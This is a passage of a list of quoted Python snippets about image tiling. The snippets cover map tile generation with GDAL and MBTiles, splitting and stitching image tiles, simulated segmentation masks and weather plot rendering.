nb=50, noise_sigma=None,\n regular=True, double_pattern_y=False, double_pattern_z=False, \n assym_y=True, assym_z=True, return_image=False):\n \n if sz == 0:\n image = np.zeros((sy, sx))\n # to overcome an issue with odd nb:\n nb = int(np.ceil(nb / 2) * 2)\n \n if regular:\n x = np.linspace(start=0, stop=sx-1, num=nb, dtype=int)\n x = np.hstack((x[::2], x[1::2]))\n if assym_y:\n nb = nb*2\n y = np.linspace(start=0, stop=sy-1, num=nb, dtype=int)\n if double_pattern_y:\n y = np.hstack((y[::2], y[1::2]))\n x_id = np.tile(x, y.size//2)\n y_id = np.repeat(y, x.size//2)\n else:\n x_id = np.random.randint(sx, size=nb)\n y_id = np.random.randint(sy, size=nb)\n \n if noise_sigma is not None:\n x_id = x_id + np.random.normal(loc=0.0, scale=noise_sigma, size=x_id.size)\n x_id[x_id<0] = 0\n x_id[x_id>sx-1] = sx-1\n x_id = np.round(x_id).astype(int)\n y_id = y_id + np.random.normal(loc=0.0, scale=noise_sigma, size=y_id.size)\n y_id[y_id<0] = 0\n y_id[y_id>sy-1] = sy-1\n y_id = np.round(y_id).astype(int)\n \n coords = np.vstack((x_id, y_id)).T\n image[y_id, x_id] = 1\n masks = segmentation.watershed(-image)\n else:\n # make 3D simulation\n image = np.zeros((sz, sy, sx))\n # to overcome an issue with odd nb:\n nb = int(np.ceil(nb / 2) * 2)\n \n if regular:\n x = np.linspace(start=0, stop=sx-1, num=nb, dtype=int)\n x = np.hstack((x[::2], x[1::2]))\n if assym_y:\n nb_y = nb*2\n y = np.linspace(start=0, stop=sy-1, num=nb_y, dtype=int)\n if assym_z:\n nb_z = nb*2\n z = np.linspace(start=0, stop=sz-1, num=nb_z, dtype=int)\n if double_pattern_y:\n y = np.hstack((y[::2], y[1::2]))\n if double_pattern_z:\n z = np.hstack((z[::2], z[1::2]))\n x_id = np.tile(x, y.size//2)\n y_id = np.repeat(y, x.size//2)\n z_id = np.repeat(z, x.size//2)\n else:\n x_id = np.random.randint(sx, size=nb)\n y_id = np.random.randint(sy, size=nb)\n z_id = np.random.randint(sz, size=nb)\n \n if noise_sigma is None:\n print(\"For 3D simulations noise_sigma needs to be > 0\")\n print(\"Setting noise_sigma to 1\")\n noise_sigma = 
1\n # x\n x_id = x_id + np.random.normal(loc=0.0, scale=noise_sigma, size=x_id.size)\n x_id[x_id<0] = 0\n x_id[x_id>sx-1] = sx-1\n x_id = np.round(x_id).astype(int)\n # y\n y_id = y_id + np.random.normal(loc=0.0, scale=noise_sigma, size=y_id.size)\n y_id[y_id<0] = 0\n y_id[y_id>sy-1] = sy-1\n y_id = np.round(y_id).astype(int)\n # z\n z_id = z_id + np.random.normal(loc=0.0, scale=noise_sigma, size=z_id.size)\n z_id[z_id<0] = 0\n z_id[z_id>sz-1] = sz-1\n z_id = np.round(z_id).astype(int)\n \n coords = np.vstack((x_id, y_id, z_id)).T\n image[z_id, y_id, x_id] = 1\n masks = segmentation.watershed(-image)\n\n if return_image:\n return coords, masks, image\n else:\n return coords, masks", "def test_generate_tiles(self):\n tile_list = utils.generate_tiles()\n self.assertEqual(len(tile_list), utils.TILE_COUNT)", "def _split_image_into_tiles(\n self, image: np.ndarray\n ) -> t.Sequence[t.Tuple[t.Tuple[t.Any, ...], np.ndarray]]:\n h, w, c = image.shape\n tile_height = (\n math.ceil(h / (self._n_tiles // 2 - 1))\n if self._n_tiles > 4\n else math.ceil(h / (self._n_tiles // 2))\n )\n tile_width = math.ceil(w / (self._n_tiles // 2))\n tiles = [] # type: ignore\n for i in range(0, h, tile_height):\n for j in range(0, w, tile_width):\n tiles.append(\n (\n (i, i + tile_height, j, j + tile_width),\n image[i : i + tile_height, j : j + tile_width, :],\n )\n )\n return tiles", "def image_to_tiles(img, tile_size):\n padding_argument = [(0,0),(0,0),(0,0)]\n for input_dim in [0,1]:\n padding_argument[input_dim] = (0, (tile_size - img.shape[input_dim]) % tile_size)\n img = np.pad(img, padding_argument, mode='constant')\n tiles = img.reshape((img.shape[0]//tile_size, \n tile_size,\n img.shape[1]//tile_size,\n tile_size,\n img.shape[2]\n )).swapaxes(1,2)\n return tiles", "def saveTiles(z, x, y, ntiles, mapname, image, suffix = 'png', imgtype = None):\n for dx in range(0, ntiles):\n tilex = x*ntiles + dx\n ensureDirExists(getTileDir(mapname, z, tilex))\n for dy in range(0, ntiles): \n tiley = y*ntiles + dy\n offsetx = BORDER_WIDTH + dx*TILE_SIZE\n offsety = BORDER_WIDTH + dy*TILE_SIZE\n view = image.view(offsetx, offsety, TILE_SIZE, TILE_SIZE)\n if imgtype:\n view.save(getTilePath(mapname, z, tilex, tiley, suffix), imgtype)\n else:\n view.save(getTilePath(mapname, z, tilex, tiley, suffix))", "def generate_base_tiles(self):\n\n gdal.SetConfigOption(\"GDAL_PAM_ENABLED\", \"NO\")\n\n print \"Generating Base Tiles:\"\n if self.options.verbose:\n #mx, my = self.out_gt[0], self.out_gt[3] # OriginX, OriginY\n #px, py = self.mercator.MetersToPixels( mx, my, self.tmaxz)\n #print \"Pixel coordinates:\", px, py, (mx, my)\n print\n print \"Tiles generated from the max zoom level:\"\n print \"----------------------------------------\"\n print\n\n\n # Set the bounds\n tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]\n querysize = self.querysize\n\n # Just the center tile\n #tminx = tminx+ (tmaxx - tminx)/2\n #tminy = tminy+ (tmaxy - tminy)/2\n #tmaxx = tminx\n #tmaxy = tminy\n\n #print tminx, tminy, tmaxx, tmaxy\n tcount = (1+abs(tmaxx-tminx)) * (1+abs(tmaxy-tminy))\n #print tcount\n ti = 0\n i_y_column_count=((tmaxy-tminy)+1)\n ds = self.out_ds\n tz = self.tmaxz\n if self.options.verbose:\n # tx in range(tminx, tmaxx+1) tminx[ 281596 ] tmaxx[ 281744 ] ; ((tmaxx-tmaxy)+1) x_tiles[ 23393 ]\n print \"\\ttz=[\",tz,\"] : tx in range(tminx, tmaxx+1) tminx[\",tminx,\"] tmaxx[\",tmaxx,\"] ; ((tmaxx-tmaxy)+1) x_tiles[\",tcount,\"]\"\n # ty_tms in range(tmaxy, tminy-1, -1) tmaxy[ 352409 ] tminy[ 352253 ] ; ((tmaxy-tminy)) y_tiles[ 
157 ] 352409-(352253-1)\n print \"\\ttz=[\",tz,\"] : ty_tms in range(tmaxy, tminy-1, -1) tmaxy[\",tmaxy,\"] tminy[\",tminy,\"] ; ((tmaxy-tminy+1)) y_tiles[\",i_y_column_count,\"]\"\n if self.options.resume:\n i_count = self.tile_exists(0, 0, tz,2)\n if i_count == tcount:\n if self.options.verbose:\n print \"\\tTile generation skipped because of --resume ; x/y-tiles of z[\",tz,\"] y_tiles[\",tcount,\"]\"\n return\n for tx in range(tminx, tmaxx+1):\n tmaxy_work=tmaxy\n if self.options.resume:\n i_count = self.tile_exists(tx, 0, tz,3)\n if i_count == i_y_column_count:\n if self.options.verbose:\n print \"\\tTile generation skipped because of --resume ; z =\",tz,\" ; y-tiles of x[\",tx,\"] y_tiles[\",i_y_column_count,\"]\"\n break\n else:\n if i_count > 0:\n # this assums the rows are compleate, which may NOT be true\n tmaxy_work-=i_count\n if self.options.verbose:\n print \"\\tTile generation skipped to tmaxy[\",tmaxy_work,\"] because of --resume ; z =\",tz,\" ; y-tiles of x[\",tx,\"] y_tiles[\",i_y_column_count,\"]\"\n for ty_tms in range(tmaxy_work, tminy-1, -1): #range(tminy, tmaxy+1):\n ty_osm=self.flip_y(tz,ty_tms)\n ty=ty_tms\n if self.options.tms_osm:\n ty=ty_osm\n if self.stopped:\n if self.options.mbtiles:\n if self.mbtiles_db:\n self.mbtiles_db.close_db()\n break\n ti += 1\n\n if self.options.resume:\n exists = self.tile_exists(tx, ty, tz,0)\n if exists and self.options.verbose:\n print \"\\tTile generation skipped because of --resume ; z =\",tz,\" ; x =\",tx,\" ; y_tms =\",ty_tms, \"; y_osm =\",ty_osm\n else:\n exists = False\n\n if not exists:\n if self.options.verbose:\n print ti, '/', tcount, self.get_verbose_tile_name(tx, ty, tz)\n # Don't scale up by nearest neighbour, better change the querysize\n # to the native resolution (and return smaller query tile) for scaling\n if self.options.profile in ('mercator','geodetic'):\n if self.options.profile == 'mercator':\n # Tile bounds in EPSG:900913\n b = self.mercator.TileBounds(tx, ty_tms, tz)\n elif self.options.profile == 'geodetic':\n b = self.geodetic.TileBounds(tx, ty_tms, tz)\n\n rb, wb = self.geo_query( ds, b[0], b[3], b[2], b[1])\n nativesize = wb[0]+wb[2] # Pixel size in the raster covering query geo extent\n if self.options.verbose:\n print \"\\tNative Extent (querysize\",nativesize,\"): \", rb, wb\n\n querysize = self.querysize\n # Tile bounds in raster coordinates for ReadRaster query\n rb, wb = self.geo_query( ds, b[0], b[3], b[2], b[1], querysize=querysize)\n\n rx, ry, rxsize, rysize = rb\n wx, wy, wxsize, wysize = wb\n else: # 'raster' or 'gearth' or 'garmin' profile:\n tsize = int(self.tsize[tz]) # tilesize in raster coordinates for actual zoom\n xsize = self.out_ds.RasterXSize # size of the raster in pixels\n ysize = self.out_ds.RasterYSize\n if tz >= self.nativezoom:\n querysize = self.tilesize # int(2**(self.nativezoom-tz) * self.tilesize)\n\n rx = (tx) * tsize\n rxsize = 0\n if tx == tmaxx:\n rxsize = xsize % tsize\n if rxsize == 0:\n rxsize = tsize\n\n rysize = 0\n if ty_tms == tmaxy:\n rysize = ysize % tsize\n if rysize == 0:\n rysize = tsize\n ry = ysize - (ty_tms * tsize) - rysize\n\n wx, wy = 0, 0\n\n wxsize, wysize = int(rxsize/float(tsize) * querysize), int(rysize/float(tsize) * querysize)\n if wysize != querysize:\n wy = querysize - wysize\n xyzzy = Xyzzy(querysize, rx, ry, rxsize, rysize, wx, wy, wxsize, wysize)\n try:\n if self.options.verbose:\n print ti,'/',tcount,' total ; z =',tz,' ; x =',tx,' ; y_tms =',ty_tms,' ; y_osm =',ty_osm\n print \"\\tReadRaster Extent: \", (rx, ry, rxsize, rysize), (wx, 
wy, wxsize, wysize)\n self.write_base_tile(tx, ty, tz, xyzzy)\n except ImageOutputException, e:\n self.error(\"'%d/%d/%d': %s\" % (tz, tx, ty, e.message))\n\n if not self.options.verbose or self.is_subprocess:\n self.progressbar( ti / float(tcount) )\n if self.options.mbtiles:\n if self.mbtiles_db:\n self.mbtiles_db.close_db()\n self.mbtiles_db=None", "def paste_chaos(image, tiles, size, shadow_off_set=(30, 30)):\n # image_all = Image.new('RGB', image.size, 0xffffff)\n image_all = image\n lst = range(len(tiles))\n random.shuffle(lst)\n fragment_size = (image.size[0] / size[0], image.size[1] / size[1])\n print 'tiles size %d X %d' % fragment_size\n print 'number of tiles one iteration: %d' % len(lst)\n for i in lst:\n im = Image.open(tiles[i])\n degree = random.randint(-20, 20)\n im = thumbnail(rotate_image(drop_shadow(add_frame(im), shadow_off_set), degree), (fragment_size[0] * 3 / 2, fragment_size[1] * 3 / 2))\n x = i % size[0] * fragment_size[0] + random.randrange(-fragment_size[0] / 2, fragment_size[0] / 2)\n y = i / size[0] * fragment_size[1] + random.randrange(-fragment_size[1] / 2, fragment_size[1] / 2)\n # print x, y\n image_all.paste(im, (x, y), im)\n return image_all", "def visualize_MTL(**images):\r\n n = len(images)\r\n plt.figure(figsize=(16, 5))\r\n for i, (name, image) in enumerate(images.items()):\r\n if image==None:\r\n continue\r\n else:\r\n plt.subplot(1, n, i + 1)\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.title(' '.join(name.split('_')).title())\r\n plt.imshow(image)\r\n plt.show()", "def __init__(self, width, height, tilesize = 256, tileformat='jpg'):\n\n self.tilesize = tilesize\n self.tileformat = tileformat\n imagesize = (width, height)\n tiles = ( math.ceil( width / tilesize ), math.ceil( height / tilesize ) )\n\n # Size (in tiles) for each tier of pyramid.\n self.tierSizeInTiles = []\n self.tierSizeInTiles.push( tiles )\n\n # Image size in pixels for each pyramid tierself\n self.tierImageSize = []\n self.tierImageSize.append( imagesize );\n\n while (imagesize[0] > tilesize or imageSize[1] > tilesize ):\n imagesize = (math.floor( imagesize[0] / 2 ), math.floor( imagesize[1] / 2) )\n tiles = ( math.ceil( imagesize[0] / tilesize ), math.ceil( imagesize[1] / tilesize ) )\n self.tierSizeInTiles.append( tiles )\n self.tierImageSize.append( imagesize )\n\n self.tierSizeInTiles.reverse()\n self.tierImageSize.reverse()\n\n # Depth of the Zoomify pyramid, number of tiers (zoom levels)\n self.numberOfTiers = len(self.tierSizeInTiles)\n\n # Number of tiles up to the given tier of pyramid.\n self.tileCountUpToTier = []\n self.tileCountUpToTier[0] = 0\n for i in range(1, self.numberOfTiers+1):\n self.tileCountUpToTier.append(\n self.tierSizeInTiles[i-1][0] * self.tierSizeInTiles[i-1][1] + self.tileCountUpToTier[i-1]\n )", "def tile(X, rows, cols):\n tiling = np.zeros((rows * X.shape[1], cols * X.shape[2], X.shape[3]), dtype = X.dtype)\n for i in range(rows):\n for j in range(cols):\n idx = i * cols + j\n if idx < X.shape[0]:\n img = X[idx,...]\n tiling[\n i*X.shape[1]:(i+1)*X.shape[1],\n j*X.shape[2]:(j+1)*X.shape[2],\n :] = img\n return tiling", "def tile(X, rows, cols):\n tiling = np.zeros((rows * X.shape[1], cols * X.shape[2], X.shape[3]), dtype = X.dtype)\n for i in range(rows):\n for j in range(cols):\n idx = i * cols + j\n if idx < X.shape[0]:\n img = X[idx,...]\n tiling[\n i*X.shape[1]:(i+1)*X.shape[1],\n j*X.shape[2]:(j+1)*X.shape[2],\n :] = img\n return tiling", "def get_tiles_from_server(self, variants, server):\n def request_and_crop(zoom, x, y):\n _x = 
int(math.floor(x))\n _y = int(math.floor(y))\n\n x_mod = 0.5 - (x - _x) #How does this desviates from 0.5\n y_mod = 0.5 - (y - _y) \n\n if x_mod > 0:\n x_start = _x - 1 #1 tile before\n start_xpixel = int(math.floor((1-x_mod)*256))\n else:\n x_start = _x\n start_xpixel = int(math.floor(-1*x_mod*256))\n if y_mod > 0:\n y_start = _y - 1 #1 tile before\n start_ypixel = int(math.floor((1-y_mod)*256))\n else:\n y_start = _y\n start_ypixel = int(math.floor(-1*y_mod*256))\n\n tile = np.zeros((256*2, 256*2, 3), dtype= 'uint8')\n for x in range(2):\n for y in range(2):\n url = 'http://localhost:8080/{}/{}/{}.png'.format(zoom, x_start + x, y_start + y)\n resp = urlopen(url)\n image = np.asarray(bytearray(resp.read()), dtype=\"uint8\")\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n tile[256*y:256*(y+1), 256*x:256*(x+1),...] = image\n tile = tile[start_ypixel:start_ypixel+256,start_xpixel:start_xpixel+256]\n return tile\n tiles = []\n for _ in range(variants):\n zoom = random.randint(19,21)\n x, y = self.getXY(zoom) \n tile = request_and_crop(zoom, x, y)\n tile = cv2.resize(tile, (self.width, self.height))\n tiles.append(tile)\n tiles = np.stack(tiles)\n return tiles", "def stitch(dir_path, in_canels=1, choice=0):\n directory = dir_path\n array = [] # array used to create matrix\n\n p = re.compile(tiles_xy_re)\n q = re.compile(original_img_xy_re)\n\n sum_of_files = len(os.listdir(directory))\n tiles_horizontal_num = 0\n\n first = os.listdir(directory)[0] # we take a sample to extract\n # original image information such as height, width, type\n\n original = q.match(first)\n Original_width, Original_height = int(original.group(1)), int(\n original.group(2))\n im = Image.open(dir_path + '\\\\' + first)\n\n tile_h = np.array(im).shape[0]\n tile_w= np.array(im).shape[1]\n file_type = first.split(\".\")[-1]\n\n # creating array to merge all tiles to\n if choice == 2: # if we choose and\n output_array = np.ones((Original_height, Original_width, in_canels))\n else:\n output_array = np.zeros((Original_height, Original_width, in_canels))\n\n for filename in os.listdir(directory):\n\n xy = p.match(filename)\n x, y = int(xy.group(1)), int(xy.group(2)) # extracting x,y relative\n # to original img\n\n im = Image.open(dir_path + '\\\\' + filename)\n if choice == 0:\n output_array[y:y + tile_h, x:x + tile_w, :] = np.array(im)\n elif choice == 1:\n output_array[y:y + tile_h, x:x + tile_w, :] = np.logical_or(\n output_array[y:y + tile_h, x:x + tile_w, :], np.array(im))\n elif choice == 2:\n output_array[y:y + tile_h, x:x + tile_w, :] = np.logical_and(\n output_array[y:y + tile_h, x:x + tile_w, :], np.array(im))\n\n output_array[y:y + tile_h, x:x + tile_w, :] = np.array(im)\n\n array.append([x, y])\n\n if int(xy.group(1)) == 0:\n tiles_horizontal_num = tiles_horizontal_num + 1\n\n # converting array to image and saving image\n output_im = Image.fromarray(output_array.astype(np.uint8))\n file_name = \"original.\" + file_type\n path = dir_path + '\\\\' + file_name\n output_im.save(path)\n\n # array = sorted(array, key=lambda k: [k[0], k[1]])\n # numpy_array = np.array(array)\n # matrix = numpy_array.reshape(sum_of_files // tiles_horizontal_num,\n # tiles_horizontal_num, 2)", "def apply_tiles(self, code: str) -> 'ImageCollection':\n\n process_id = 'apply_tiles'\n args = {\n 'imagery':self.graph,\n 'code':{\n 'language':'python',\n 'source':code\n }\n }\n\n return self.graph_add_process(process_id, args)", "def apply_tiles(self, code: str) -> 'ImageCollection':\n\n process_id = 'apply_tiles'\n args = {\n 
'imagery':self.graph,\n 'code':{\n 'language':'python',\n 'source':code\n }\n }\n\n return self.graph_add_process(process_id, args)", "def get_template_series(self, nb_images):\n\n # Tab for the series of images\n self.template = []\n\n # Tab\n temp = []\n\n # Make current position the zero position\n self.arm.set_to_zero([0, 1, 2])\n self.microscope.set_to_zero([0, 1, 2])\n\n # Take imges only in the template zone\n template = self.template_zone()\n height, width = template.shape[:2]\n\n # Tab of weight to detect where the pipette is\n weight = []\n\n # Detecting the tip\n for i in range(3):\n for j in range(3):\n if (i != 1) & (j != 1):\n # divide template zone into 8 images\n temp = template[i * height / 4:height / 2 + i * height / 4, j * width / 4:width / 2 + j * width / 4]\n\n # Search the tip using the number of darkest pixel in the image\n bin_edge, _ = np.histogram(temp.flatten())\n weight += [bin_edge.min()]\n else:\n # image is the center of template zone, do not consider to have functional get_withdraw_sign method\n weight += [-1]\n\n # pipette is in the image with the most darkest pixels\n index = weight.index(max(weight))\n j = index % 3\n i = index // 3\n\n # Update the position of the tip in image\n self.template_loc = [temp.shape[1] * (1 - j / 2.), temp.shape[0] * (1 - i / 2.)]\n\n # Get the series of template images at different height\n for k in range(nb_images):\n self.microscope.absolute_move(k - (nb_images - 1) / 2, 2)\n self.microscope.wait_motor_stop(2)\n time.sleep(1)\n img = self.template_zone()\n height, width = img.shape[:2]\n img = img[i * height / 4:height / 2 + i * height / 4, j * width / 4:width / 2 + j * width / 4]\n self.template += [img]\n\n # reset position at the end\n self.go_to_zero()\n pass", "def make_floor(self):\n\n for y in range(0, self.num_tiles[1] + 1):\n for x in range(0, self.num_tiles[0] + 1):\n offset = (x * self.tile.size[0], y * self.tile.size[1])\n self.image.blit(self.tile.image, offset)", "def genImages(self, gen_ts):\n t1 = time.time()\n ngen = 0\n\n # determine how much logging is desired\n log_success = to_bool(search_up(self.image_dict, 'log_success', True))\n\n # Loop over each time span class (day, week, month, etc.):\n for timespan in self.image_dict.sections:\n\n # Now, loop over all plot names in this time span class:\n for plotname in self.image_dict[timespan].sections:\n\n # Accumulate all options from parent nodes:\n plot_options = accumulateLeaves(self.image_dict[timespan][plotname])\n\n plotgen_ts = gen_ts\n if not plotgen_ts:\n binding = plot_options['data_binding']\n db_manager = self.db_binder.get_manager(binding)\n plotgen_ts = db_manager.lastGoodStamp()\n if not plotgen_ts:\n plotgen_ts = time.time()\n\n image_root = os.path.join(self.config_dict['WEEWX_ROOT'],\n plot_options['HTML_ROOT'])\n # Get the path that the image is going to be saved to:\n img_file = os.path.join(image_root, '%s.png' % plotname)\n\n # Convert from string to an integer:\n ai = weeutil.weeutil.nominal_spans(plot_options.get('aggregate_interval'))\n # Check whether this plot needs to be done at all:\n if skipThisPlot(plotgen_ts, ai, img_file):\n continue\n\n # skip image files that are fresh, but only if staleness is defined\n stale = to_int(plot_options.get('stale_age'))\n if stale:\n t_now = time.time()\n try:\n last_mod = os.path.getmtime(img_file)\n if t_now - last_mod < stale:\n log.debug(\"Skip '%s': last_mod=%s age=%s stale=%s\",\n img_file, last_mod, t_now - last_mod, stale)\n continue\n except os.error:\n pass\n\n # Create the 
subdirectory that the image is to be put in. Wrap in a try block in\n # case it already exists.\n try:\n os.makedirs(os.path.dirname(img_file))\n except OSError:\n pass\n\n # Create a new instance of a time plot and start adding to it\n plot = weeplot.genplot.TimePlot(plot_options)\n\n # Calculate a suitable min, max time for the requested time.\n minstamp, maxstamp, timeinc = weeplot.utilities.scaletime(\n plotgen_ts - int(plot_options.get('time_length', 86400)), plotgen_ts)\n # Override the x interval if the user has given an explicit interval:\n timeinc_user = to_int(plot_options.get('x_interval'))\n if timeinc_user is not None:\n timeinc = timeinc_user\n plot.setXScaling((minstamp, maxstamp, timeinc))\n\n # Set the y-scaling, using any user-supplied hints:\n yscale = plot_options.get('yscale', ['None', 'None', 'None'])\n plot.setYScaling(weeutil.weeutil.convertToFloat(yscale))\n\n # Get a suitable bottom label:\n bottom_label_format = plot_options.get('bottom_label_format', '%m/%d/%y %H:%M')\n bottom_label = time.strftime(bottom_label_format, time.localtime(plotgen_ts))\n plot.setBottomLabel(bottom_label)\n\n # Set day/night display\n plot.setLocation(self.stn_info.latitude_f, self.stn_info.longitude_f)\n plot.setDayNight(to_bool(plot_options.get('show_daynight', False)),\n weeplot.utilities.tobgr(plot_options.get('daynight_day_color',\n '0xffffff')),\n weeplot.utilities.tobgr(plot_options.get('daynight_night_color',\n '0xf0f0f0')),\n weeplot.utilities.tobgr(plot_options.get('daynight_edge_color',\n '0xefefef')))\n\n # Loop over each line to be added to the plot.\n for line_name in self.image_dict[timespan][plotname].sections:\n\n # Accumulate options from parent nodes.\n line_options = accumulateLeaves(self.image_dict[timespan][plotname][line_name])\n\n # See what observation type to use for this line. By default, use the section\n # name.\n var_type = line_options.get('data_type', line_name)\n\n # Look for aggregation type:\n aggregate_type = line_options.get('aggregate_type')\n if aggregate_type in (None, '', 'None', 'none'):\n # No aggregation specified.\n aggregate_type = aggregate_interval = None\n else:\n try:\n # Aggregation specified. 
Get the interval.\n aggregate_interval = weeutil.weeutil.nominal_spans(\n line_options['aggregate_interval'])\n except KeyError:\n log.error(\"Aggregate interval required for aggregate type %s\",\n aggregate_type)\n log.error(\"Line type %s skipped\", var_type)\n continue\n\n # Now its time to find and hit the database:\n binding = line_options['data_binding']\n db_manager = self.db_binder.get_manager(binding)\n # we need to pass the line options and plotgen_ts to our xtype\n # first get a copy of line_options\n option_dict = dict(line_options)\n # but we need to pop off aggregate_type and\n # aggregate_interval as they are used as explicit arguments\n # in our xtypes call\n option_dict.pop('aggregate_type', None)\n option_dict.pop('aggregate_interval', None)\n # then add plotgen_ts\n option_dict['plotgen_ts'] = plotgen_ts\n start_vec_t, stop_vec_t ,data_vec_t = weewx.xtypes.get_series(\n var_type,\n TimeSpan(minstamp, maxstamp),\n db_manager,\n aggregate_type=aggregate_type,\n aggregate_interval=aggregate_interval,\n **option_dict)\n\n # Get the type of plot (\"bar', 'line', or 'vector')\n plot_type = line_options.get('plot_type', 'line').lower()\n\n if aggregate_type and plot_type != 'bar':\n # If aggregating, put the point in the middle of the interval\n start_vec_t = ValueTuple(\n [x - aggregate_interval / 2.0 for x in start_vec_t[0]], # Value\n start_vec_t[1], # Unit\n start_vec_t[2]) # Unit group\n stop_vec_t = ValueTuple(\n [x - aggregate_interval / 2.0 for x in stop_vec_t[0]], # Velue\n stop_vec_t[1], # Unit\n stop_vec_t[2]) # Unit group\n\n # Convert the data to the requested units\n new_data_vec_t = self.converter.convert(data_vec_t)\n\n # Add a unit label. NB: all will get overwritten except the last. Get the label\n # from the configuration dictionary.\n unit_label = line_options.get(\n 'y_label', self.formatter.get_label_string(new_data_vec_t[1]))\n # Strip off any leading and trailing whitespace so it's easy to center\n plot.setUnitLabel(unit_label.strip())\n\n # See if a line label has been explicitly requested:\n label = line_options.get('label')\n if label:\n # Yes. Get the text translation\n label = self.text_dict[label]\n else:\n # No explicit label. Look up a generic one.\n # NB: generic_dict is a KeyDict which will substitute the key\n # if the value is not in the dictionary.\n label = self.generic_dict[var_type]\n\n # See if a color has been explicitly requested.\n color = line_options.get('color')\n if color is not None: color = weeplot.utilities.tobgr(color)\n fill_color = line_options.get('fill_color')\n if fill_color is not None: fill_color = weeplot.utilities.tobgr(fill_color)\n\n # Get the line width, if explicitly requested.\n width = to_int(line_options.get('width'))\n\n interval_vec = None\n gap_fraction = None\n vector_rotate = None\n\n # Some plot types require special treatments:\n if plot_type == 'vector':\n vector_rotate_str = line_options.get('vector_rotate')\n vector_rotate = -float(vector_rotate_str) \\\n if vector_rotate_str is not None else None\n elif plot_type == 'bar':\n interval_vec = [x[1] - x[0] for x in\n zip(start_vec_t.value, stop_vec_t.value)]\n elif plot_type == 'line':\n gap_fraction = to_float(line_options.get('line_gap_fraction'))\n if gap_fraction is not None and not 0 < gap_fraction < 1:\n log.error(\"Gap fraction %5.3f outside range 0 to 1. Ignored.\",\n gap_fraction)\n gap_fraction = None\n else:\n log.error(\"Unknown plot type '%s'. 
Ignored\", plot_type)\n continue\n\n # Get the type of line (only 'solid' or 'none' for now)\n line_type = line_options.get('line_type', 'solid')\n if line_type.strip().lower() in ['', 'none']:\n line_type = None\n\n marker_type = line_options.get('marker_type')\n marker_size = to_int(line_options.get('marker_size', 8))\n \n # Add the line to the emerging plot:\n plot.addLine(weeplot.genplot.PlotLine(\n stop_vec_t[0], new_data_vec_t[0],\n label = label,\n color = color,\n fill_color = fill_color,\n width = width,\n plot_type = plot_type,\n line_type = line_type,\n marker_type = marker_type,\n marker_size = marker_size,\n bar_width = interval_vec,\n vector_rotate = vector_rotate,\n gap_fraction = gap_fraction))\n\n # OK, the plot is ready. Render it onto an image\n image = plot.render()\n\n try:\n # Now save the image\n image.save(img_file)\n ngen += 1\n except IOError as e:\n log.error(\"Unable to save to file '%s' %s:\", img_file, e)\n t2 = time.time()\n\n if log_success:\n log.info(\"Generated %d images for report %s in %.2f seconds\",\n ngen,\n self.skin_dict['REPORT_NAME'], t2 - t1)", "def mbtiles(ctx, files, output, overwrite, title, description,\n layer_type, img_format, tile_size, zoom_levels, image_dump,\n num_workers, src_nodata, dst_nodata, resampling):\n output, files = resolve_inout(files=files, output=output,\n overwrite=overwrite)\n inputfile = files[0]\n\n logger = logging.getLogger('rio-mbtiles')\n\n with ctx.obj['env']:\n\n # Read metadata from the source dataset.\n with rasterio.open(inputfile) as src:\n\n validate_nodata(dst_nodata, src_nodata, src.profile.get('nodata'))\n base_kwds = {'dst_nodata': dst_nodata, 'src_nodata': src_nodata}\n\n if src_nodata is not None:\n base_kwds.update(nodata=src_nodata)\n\n if dst_nodata is not None:\n base_kwds.update(nodata=dst_nodata)\n\n # Name and description.\n title = title or os.path.basename(src.name)\n description = description or src.name\n\n # Compute the geographic bounding box of the dataset.\n (west, east), (south, north) = transform(\n src.crs, 'EPSG:4326', src.bounds[::2], src.bounds[1::2])\n\n # Resolve the minimum and maximum zoom levels for export.\n if zoom_levels:\n minzoom, maxzoom = map(int, zoom_levels.split('..'))\n else:\n zw = int(round(math.log(360.0 / (east - west), 2.0)))\n zh = int(round(math.log(170.1022 / (north - south), 2.0)))\n minzoom = min(zw, zh)\n maxzoom = max(zw, zh)\n\n logger.debug(\"Zoom range: %d..%d\", minzoom, maxzoom)\n\n # Parameters for creation of tile images.\n base_kwds.update({\n 'driver': img_format.upper(),\n 'dtype': 'uint8',\n 'nodata': 0,\n 'height': tile_size,\n 'width': tile_size,\n 'count': 3,\n 'crs': TILES_CRS})\n\n img_ext = 'jpg' if img_format.lower() == 'jpeg' else 'png'\n\n # Initialize the sqlite db.\n if os.path.exists(output):\n os.unlink(output)\n # workaround for bug here: https://bugs.python.org/issue27126\n sqlite3.connect(':memory:').close()\n\n conn = sqlite3.connect(output)\n cur = conn.cursor()\n cur.execute(\n \"CREATE TABLE tiles \"\n \"(zoom_level integer, tile_column integer, \"\n \"tile_row integer, tile_data blob);\")\n cur.execute(\n \"CREATE TABLE metadata (name text, value text);\")\n\n # Insert mbtiles metadata into db.\n cur.execute(\n \"INSERT INTO metadata (name, value) VALUES (?, ?);\",\n (\"name\", title))\n cur.execute(\n \"INSERT INTO metadata (name, value) VALUES (?, ?);\",\n (\"type\", layer_type))\n cur.execute(\n \"INSERT INTO metadata (name, value) VALUES (?, ?);\",\n (\"version\", \"1.1\"))\n cur.execute(\n \"INSERT INTO metadata 
(name, value) VALUES (?, ?);\",\n (\"description\", description))\n cur.execute(\n \"INSERT INTO metadata (name, value) VALUES (?, ?);\",\n (\"format\", img_ext))\n cur.execute(\n \"INSERT INTO metadata (name, value) VALUES (?, ?);\",\n (\"bounds\", \"%f,%f,%f,%f\" % (west, south, east, north)))\n\n conn.commit()\n\n # Create a pool of workers to process tile tasks.\n pool = Pool(num_workers, init_worker,\n (inputfile, base_kwds, resampling), 100)\n\n # Constrain bounds.\n EPS = 1.0e-10\n west = max(-180 + EPS, west)\n south = max(-85.051129, south)\n east = min(180 - EPS, east)\n north = min(85.051129, north)\n\n # Initialize iterator over output tiles.\n tiles = mercantile.tiles(\n west, south, east, north, range(minzoom, maxzoom + 1))\n\n for tile, contents in pool.imap_unordered(process_tile, tiles):\n\n if contents is None:\n logger.info(\"Tile %r is empty and will be skipped\", tile)\n continue\n\n # MBTiles has a different origin than Mercantile/tilebelt.\n tiley = int(math.pow(2, tile.z)) - tile.y - 1\n\n # Optional image dump.\n if image_dump:\n img_name = '%d-%d-%d.%s' % (\n tile.x, tiley, tile.z, img_ext)\n img_path = os.path.join(image_dump, img_name)\n with open(img_path, 'wb') as img:\n img.write(contents)\n\n # Insert tile into db.\n cur.execute(\n \"INSERT INTO tiles \"\n \"(zoom_level, tile_column, tile_row, 